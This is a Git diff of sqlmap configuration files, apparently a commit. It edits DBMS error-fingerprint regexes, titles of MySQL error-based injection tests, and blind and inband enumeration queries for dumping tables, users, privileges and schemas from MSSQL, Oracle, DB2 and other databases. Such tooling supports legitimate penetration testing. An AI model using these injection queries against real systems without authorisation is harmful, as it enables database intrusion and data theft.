<error regexp="Informix ODBC Driver"/>
|
||||
<error regexp="com\.informix\.jdbc"/>
|
||||
<error regexp="weblogic\.jdbc\.informix"/>
|
||||
@@ -79,51 +80,54 @@
|
||||
<!-- Interbase/Firebird -->
|
||||
<dbms value="Firebird">
|
||||
<error regexp="Dynamic SQL Error"/>
|
||||
<error regexp="Warning.*ibase_.*"/>
|
||||
<error regexp="Warning.*?ibase_"/>
|
||||
</dbms>
|
||||
|
||||
<!-- SQLite -->
|
||||
<dbms value="SQLite">
|
||||
<error regexp="SQLite/JDBCDriver"/>
|
||||
<error regexp="SQLite\.Exception"/>
|
||||
<error regexp="System\.Data\.SQLite\.SQLiteException"/>
|
||||
<error regexp="Warning.*sqlite_.*"/>
|
||||
<error regexp="Warning.*SQLite3::"/>
|
||||
<error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
|
||||
<error regexp="Warning.*?sqlite_"/>
|
||||
<error regexp="Warning.*?SQLite3::"/>
|
||||
<error regexp="\[SQLITE_ERROR\]"/>
|
||||
<error regexp="SQLite error \d+:"/>
|
||||
<error regexp="sqlite3.OperationalError:"/>
|
||||
</dbms>
|
||||
|
||||
<!-- SAP MaxDB -->
|
||||
<dbms value="SAP MaxDB">
|
||||
<error regexp="SQL error.*POS([0-9]+).*"/>
|
||||
<error regexp="Warning.*maxdb.*"/>
|
||||
<error regexp="SQL error.*?POS([0-9]+)"/>
|
||||
<error regexp="Warning.*?maxdb"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Sybase -->
|
||||
<dbms value="Sybase">
|
||||
<error regexp="Warning.*sybase.*"/>
|
||||
<error regexp="Warning.*?sybase"/>
|
||||
<error regexp="Sybase message"/>
|
||||
<error regexp="Sybase.*Server message.*"/>
|
||||
<error regexp="Sybase.*?Server message"/>
|
||||
<error regexp="SybSQLException"/>
|
||||
<error regexp="com\.sybase\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Ingres -->
|
||||
<dbms value="Ingres">
|
||||
<error regexp="Warning.*ingres_"/>
|
||||
<error regexp="Warning.*?ingres_"/>
|
||||
<error regexp="Ingres SQLSTATE"/>
|
||||
<error regexp="Ingres\W.*Driver"/>
|
||||
<error regexp="Ingres\W.*?Driver"/>
|
||||
</dbms>
|
||||
|
||||
<!-- Frontbase -->
|
||||
<dbms value="Frontbase">
|
||||
<error regexp="Exception (condition )?\d+. Transaction rollback."/>
|
||||
<error regexp="Exception (condition )?\d+\. Transaction rollback"/>
|
||||
<error regexp="com\.frontbase\.jdbc"/>
|
||||
</dbms>
|
||||
|
||||
<!-- HSQLDB -->
|
||||
<dbms value="HSQLDB">
|
||||
<error regexp="org\.hsqldb\.jdbc"/>
|
||||
<error regexp="Unexpected end of command in statement \["/>
|
||||
<error regexp="Unexpected token.*in statement \["/>
|
||||
<error regexp="Unexpected token.*?in statement \["/>
|
||||
</dbms>
|
||||
|
||||
</root>
|
||||
|
||||
@@ -28,7 +28,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
@@ -72,7 +72,7 @@
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)</title>
|
||||
<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
@@ -113,7 +113,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)</title>
|
||||
<title>MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>
|
||||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
@@ -305,7 +305,7 @@
|
||||
|
||||
<test>
|
||||
<!-- It does not work against ORDER BY or GROUP BY clause -->
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)</title>
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
|
||||
@@ -194,7 +194,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(NVARCHAR(4000),%s) LIKE '%s'" query3="SELECT %s FROM (SELECT %s, ROW_NUMBER() OVER (ORDER BY (SELECT 1)) AS LIMIT FROM %s)x WHERE LIMIT=%d" count="SELECT LTRIM(STR(COUNT(*))) FROM %s" count2="SELECT LTRIM(STR(COUNT(DISTINCT(%s)))) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -283,7 +283,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT %s AS ENTRY_VALUE,ROWNUM AS LIMIT FROM %s) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM (SELECT qq.*,ROWNUM AS LIMIT FROM %s qq) WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<!-- NOTE: in Oracle schema names are the counterpart to database names on other DBMSes -->
|
||||
<search_db>
|
||||
@@ -506,7 +506,7 @@
|
||||
</roles>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CHR(%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CHR(%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
|
||||
</dump_table>
|
||||
</dbms>
|
||||
|
||||
@@ -563,7 +563,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS value_table"/>
|
||||
<blind query="SELECT MIN(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONVERT(VARCHAR(4000),%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(*) FROM (SELECT DISTINCT %s FROM %s) AS qq"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT name FROM master..sysdatabases WHERE %s" condition="name"/>
|
||||
@@ -586,7 +586,7 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS foobar WHERE LIMIT"/>
|
||||
<limit query="ROW_NUMBER() OVER () AS LIMIT %s) AS qq WHERE LIMIT"/>
|
||||
<limitregexp query="ROW_NUMBER\(\)\s+OVER\s+\(\)\s+AS\s+.+?\s+FROM\s+.+?\)\s+WHERE\s+.+?\s*=\s*[\d]+"/>
|
||||
<limitgroupstart/>
|
||||
<limitgroupstop/>
|
||||
@@ -601,7 +601,7 @@
|
||||
<hex query="HEX(%s)"/>
|
||||
<inference query="SUBSTR((%s),%d,1)>'%c'"/>
|
||||
<!-- NOTE: We have to use the complicated UDB OLAP functions in query2 because sqlmap injects isnull query inside MAX function, else we would use: SELECT MAX(versionnumber) FROM sysibm.sysversions -->
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS foobar WHERE LIMIT=1"/>
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
|
||||
<current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
|
||||
<current_db query="SELECT current server FROM SYSIBM.SYSDUMMY1"/>
|
||||
@@ -611,23 +611,23 @@
|
||||
<is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
|
||||
<users>
|
||||
<inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
</users>
|
||||
<!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
</privileges>
|
||||
<roles/>
|
||||
<!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS foobar WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||
@@ -635,19 +635,19 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS foobar WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS foobar" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT DISTINCT(schemaname) FROM syscat.schemata WHERE %s) AS qq" count="SELECT COUNT(DISTINCT(schemaname)) FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
</search_db>
|
||||
<search_table>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables WHERE %s" condition="tabname" condition2="tabschema"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.tables WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.tables WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.tables WHERE %s" count2="SELECT COUNT(tabname) FROM sysstat.tables WHERE tabschema='%s'" condition="tabname" condition2="tabschema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.columns WHERE %s" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS foobar" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
<blind query="SELECT tabschema FROM (SELECT DISTINCT(tabschema) FROM sysstat.columns WHERE %s) AS qq" query2="SELECT DISTINCT(tabname) FROM sysstat.columns WHERE tabschema='%s'" count="SELECT COUNT(DISTINCT(tabschema)) FROM sysstat.columns WHERE %s" count2="SELECT COUNT(DISTINCT(tabname)) FROM sysstat.columns WHERE tabschema='%s'" condition="colname" condition2="tabschema" condition3="tabname"/>
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
|
||||
Reference in New Issue
Block a user